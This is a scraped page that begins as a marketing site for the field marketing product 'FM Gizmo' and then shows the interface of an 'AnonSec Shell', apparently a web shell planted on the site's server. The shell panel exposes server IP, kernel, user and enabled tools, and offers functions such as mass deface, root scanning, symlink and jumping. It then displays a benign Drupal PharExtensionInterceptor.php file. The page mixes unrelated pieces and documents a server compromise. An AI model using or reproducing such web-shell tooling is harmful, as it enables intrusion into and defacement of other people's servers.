Portfolio

sed quia non numquam eius modi tempora.

You are here

Contact Us

About FM Gizmo

FM Gizmo is a one-stop field marketing solution.

FM Gizmo's customizability can help you fulfil all your field activity needs.

Order FM Gizmo now and Switch to working wisely.

Get In Touch

912, Opal Square, Wagle Estate, Thane(W) - 400604, Maharashtra

sales@fmgizmo.com

Contact
AnonSec Shell
AnonSec Shell
Server IP : 158.69.222.254  /  Your IP : 216.73.216.235   [ Reverse IP ]
Web Server : nginx/1.12.2
System : Linux vps63628.vps.ovh.ca 3.10.0-957.27.2.el7.x86_64 #1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64
User : webadmin ( 1001)
PHP Version : 7.3.19
Disable Function : NONE
Domains : 5 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/fmgizmo/misc/typo3/drupal-security/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/fmgizmo/misc/typo3/drupal-security/PharExtensionInterceptor.php
<?php

namespace Drupal\Core\Security;

use TYPO3\PharStreamWrapper\Assertable;
use TYPO3\PharStreamWrapper\Helper;
use TYPO3\PharStreamWrapper\Exception;

/**
 * An alternate PharExtensionInterceptor to support phar-based CLI tools.
 *
 * @see \TYPO3\PharStreamWrapper\Interceptor\PharExtensionInterceptor
 */
class PharExtensionInterceptor implements Assertable {

  /**
   * Determines whether phar file is allowed to execute.
   *
   * The phar file is allowed to execute if:
   * - the base file name has a ".phar" suffix.
   * - it is the CLI tool that has invoked the interceptor.
   *
   * @param string $path
   *   The path of the phar file to check.
   * @param string $command
   *   The command being carried out.
   *
   * @return bool
   *   TRUE if the phar file is allowed to execute.
   *
   * @throws Exception
   *   Thrown when the file is not allowed to execute.
   */
  public function assert($path, $command) {
    if ($this->baseFileContainsPharExtension($path)) {
      return TRUE;
    }
    throw new Exception(
      sprintf(
        'Unexpected file extension in "%s"',
        $path
      ),
      1535198703
    );
  }

  /**
   * Determines if a path has a .phar extension or invoked execution.
   *
   * @param string $path
   *   The path of the phar file to check.
   *
   * @return bool
   *   TRUE if the file has a .phar extension or if the execution has been
   *   invoked by the phar file.
   */
  private function baseFileContainsPharExtension($path) {
    $baseFile = Helper::determineBaseFile($path);
    if ($baseFile === NULL) {
      return FALSE;
    }
    // If the stream wrapper is registered by invoking a phar file that does
    // not not have .phar extension then this should be allowed. For
    // example, some CLI tools recommend removing the extension.
    $backtrace = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS);
    // Find the last entry in the backtrace containing a 'file' key as
    // sometimes the last caller is executed outside the scope of a file. For
    // example, this occurs with shutdown functions.
    do {
      $caller = array_pop($backtrace);
    } while (empty($caller['file']) && !empty($backtrace));
    if (isset($caller['file']) && $baseFile === Helper::determineBaseFile($caller['file'])) {
      return TRUE;
    }
    $fileExtension = pathinfo($baseFile, PATHINFO_EXTENSION);
    return strtolower($fileExtension) === 'phar';
  }

}

Anon7 - 2022
AnonSec Team